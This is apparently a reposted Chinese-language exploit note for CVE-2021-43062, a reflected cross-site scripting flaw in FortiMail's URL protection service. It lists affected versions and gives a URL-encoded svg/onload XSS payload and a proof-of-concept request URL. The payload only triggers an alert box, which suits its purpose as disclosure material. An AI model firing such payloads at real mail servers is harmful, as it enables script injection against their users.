# 软件链接:https://fortimail.fortidemo.com/m/webmail/(厂商在线演示)
# 版本:
# FortiMail 7.0.1 及以下版本
# FortiMail 6.4.5 及以下版本
# FortiMail 6.2.7 及以下版本
# CVE:CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
一、说明:
FortiMail 中的网页生成漏洞(“跨站点脚本”)[CWE-79] 期间输入的不当无效化可能允许未经身份验证的攻击者通过对 FortiGuard URI 保护服务的精心制作的 HTTP GET 请求执行 XSS 攻击。
2. 负载:https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. 概念证明:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。